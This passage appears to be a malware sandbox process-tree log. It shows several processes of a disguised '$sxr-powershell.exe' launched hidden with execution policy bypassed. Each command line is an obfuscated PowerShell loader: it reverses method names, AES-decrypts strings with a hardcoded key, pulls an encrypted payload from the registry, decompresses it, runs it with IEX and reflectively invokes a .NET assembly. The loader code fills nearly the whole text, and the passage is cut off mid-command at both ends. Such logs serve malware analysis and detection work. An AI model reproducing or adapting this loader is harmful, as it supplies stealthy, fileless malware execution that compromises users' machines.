$zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        36⤵
        
        PID:5308
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5308).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        37⤵
        
        PID:8080
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5308).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        37⤵
        
        PID:1196
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5308).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        37⤵
        
        PID:9888
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5308).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 